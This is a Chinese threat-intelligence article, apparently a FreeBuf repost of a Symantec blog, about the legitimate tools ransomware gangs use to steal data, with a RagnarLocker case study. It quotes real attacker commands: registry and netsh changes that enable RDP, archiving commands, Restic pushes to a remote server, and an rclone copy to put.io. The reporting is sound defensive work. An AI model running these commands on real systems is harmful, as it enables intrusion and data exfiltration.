勒索軟件團伙在攻擊中使用了越來越多的數(shù)據(jù)泄露工具��,賽門鐵克在三個月內就發(fā)現(xiàn)了十幾種不同的工具進行數(shù)據(jù)泄露�。雖然其中一些工具是惡意軟件���,但絕大多數(shù)都是合法軟件��。
現(xiàn)在大多數(shù)勒索軟件運營商都會使用雙重勒索進行攻擊���。除了加密文件外,攻擊者也會從受害者處竊取數(shù)據(jù)并威脅受害者泄露數(shù)據(jù)���。該策略已經(jīng)被一再證明有效��,為攻擊者提供了更多的敲詐資本�����,對付那些能夠從備份中恢復數(shù)據(jù)的組織��。
勒索軟件團伙應用數(shù)據(jù)泄露工具的范圍正在擴大����,主要驅動因素有兩個:
• 攻擊者意識到了某些軟件的潛在功能可以利用
• 攻擊者希望找到過于顯眼的攻擊工具的替代品
盡管 Rclone 目前仍然是勒索軟件團伙最常用的數(shù)據(jù)泄露工具,但遠程管理類軟件的增速最快�����,例如 AnyDesk����、ScreenConnect 和 Atera。數(shù)據(jù)泄露只是這些良性軟件的功能之一��,大多數(shù)軟件都可以變成訪問失陷主機的后門��。
勒索軟件團伙與數(shù)據(jù)泄露工具
在過去三個月中��,攻擊者最常用的數(shù)據(jù)泄露工具如下所示:
• Rclone:Rclone 是管理云上數(shù)據(jù)內容的開源工具�����,經(jīng)常被勒索軟件團伙用于竊取數(shù)據(jù)�����。
• AnyDesk:AnyDesk 是合法的遠程管理軟件,攻擊者可以遠程訪問失陷主機����。
• RDP:遠程桌面協(xié)議�,使攻擊者可以連接到并控制另一臺計算機。
例如�,攻擊者可以通過簡單修改注冊表來啟用 RDP:
1 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
攻擊者還可以創(chuàng)建防火墻規(guī)則,通過 netsh 命令允許 RDP 連接:
1 netsh advfirewall firewall add rule name=[NAME] RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
• Cobalt Strike:可以執(zhí)行命令���、注入進程�、提升權限�����。該工具可以作為合法滲透測試工具使用���,但被各種攻擊者濫用���。攻擊者利用 Cobalt Strike 的 Beacon 與失陷主機建立通信,支持攻擊者秘密地泄露敏感數(shù)據(jù)���。工具模擬正常的網(wǎng)絡流量并和正常的網(wǎng)絡流量混合在一起����,攻擊者就可以外傳有價值的數(shù)據(jù)。
• ConnectWise:遠程桌面管理工具�,用于實現(xiàn)對失陷主機的遠程訪問。
• Atera:攻擊者經(jīng)常濫用的合法遠程訪問軟件�����。
• WinRAR:用于壓縮和解壓的軟件�,攻擊者使用此類軟件壓縮回傳的數(shù)據(jù)。
1 cmd /u [REMOVED] CSIDL_COMMON_APPDATA\rar.exe a -dh -hp[REMOVED] -m5 CSIDL_COMMON_APPDATA\1.rar CSIDL_COMMON_APPDATA\1.txt > CSIDL_COMMON_APPDATA\log.txt
• Restic:開源備份工具���,適用于各種平臺(Windows�����、Linux 和 OSX)�����。Restic 支持各種存儲后端��,包括本地文件系統(tǒng)��、SFTP 服務器��、Amazon S3��、Microsoft Azure 和 Google Cloud Storage 等���。
Noberus 勒索軟件使用的 Restic 命令如下所示�,各種命令回傳數(shù)據(jù):
1 CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ init [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt
2 CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt --use-fs-snapshot --verbose backup "CSIDL_SYSTEM_DRIVE\[REMOVED]"
• TightVNC:開源遠程管理軟件����。
• WinSCP:Windows 平臺下 SFTP/FTP 客戶端�����。
• Pandora RC:從前被稱為 eHorus 的合法遠程管理工具�,
• Chisel:開源代理工具,能夠創(chuàng)建加密隧道����。攻擊者創(chuàng)建從失陷主機到攻擊基礎設施的隧道,通過 HTTP 傳輸并通過 SSH 進行加密�����。
• PowerShell:在各種勒索軟件攻擊行動中常被攻擊者使用的腳本工具,包括 Compress-Archive cmdlet:
1 powershell Compress-Archive CSIDL_PROFILE\public\[REMOVED]-fs CSIDL_PROFILE\public\[REMOVED]-fs.zip
案例研究:RagnarLocker 使用 Rclone
Rclone 是管理云中數(shù)據(jù)內容的開源工具�����,攻擊者利用該工具從失陷主機竊取數(shù)據(jù)����。勒索軟件團伙現(xiàn)在非常頻繁地使用 Rclone,攻擊者也開始重命名偽裝成其他工具�。
2023 年 7 月,RagnarLocker 勒索軟件團伙使用了 Rclone����。首先,攻擊者執(zhí)行 PowerShell 命令以禁用 LSA 機制����。然后,攻擊者運行了 SoftPerfect Network Scanner 檢測發(fā)現(xiàn)主機名和網(wǎng)絡服務���。
第二天����,攻擊者部署了 Mimikatz 和 LaZagne 來轉儲憑據(jù)并且收集系統(tǒng)信息���、保存注冊表配置���、執(zhí)行遠程命令���,啟用了 RDP 協(xié)議以便遠程訪問。最后�,攻擊者使用 Rclone 獲取數(shù)據(jù):
1 rclone copy \\[REMOVED]\[REMOVED]\Shares --max-age 2095d [REMOVED]:[REMOVED]/ -P --exclude "*.{zip,log,rar,wav,mp4,mpeg}" --ignore-existing --auto-confirm --multi-thread-streams 6 --transfers 6
有趣的是,攻擊者的命令中有許多錯誤���,這說明攻擊者是手動輸入命令執(zhí)行而非自動化執(zhí)行�����。攻擊者啟用了文件共享服務 put.io 作為 Rclone 的連接,回傳泄露的數(shù)據(jù):
• https://api.put[.]io
• https://s100.put[.]io
• https://s101.put[.]io
• https://s102.put[.]io
• https://s103.put[.]io
• https://upload.put[.]io
數(shù)據(jù)被泄露后����,攻擊者進入攻擊的下一階段,開始部署 RagnarLocker�。
逃避檢測
對大多數(shù)勒索軟件團伙來說,數(shù)據(jù)泄露是攻擊鏈中的關鍵步驟�����。攻擊者創(chuàng)建了暗網(wǎng)數(shù)據(jù)泄露網(wǎng)站,發(fā)布不支付贖金的受害者的被竊數(shù)據(jù)����。有能力的攻擊者自研惡意軟件,但也有攻擊者選擇轉向使用合法軟件���,這樣避免觸發(fā)告警����。
參考資料:https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-data-exfiltration
來源:FreeBuf
在線咨詢
在線咨詢
0371-63319761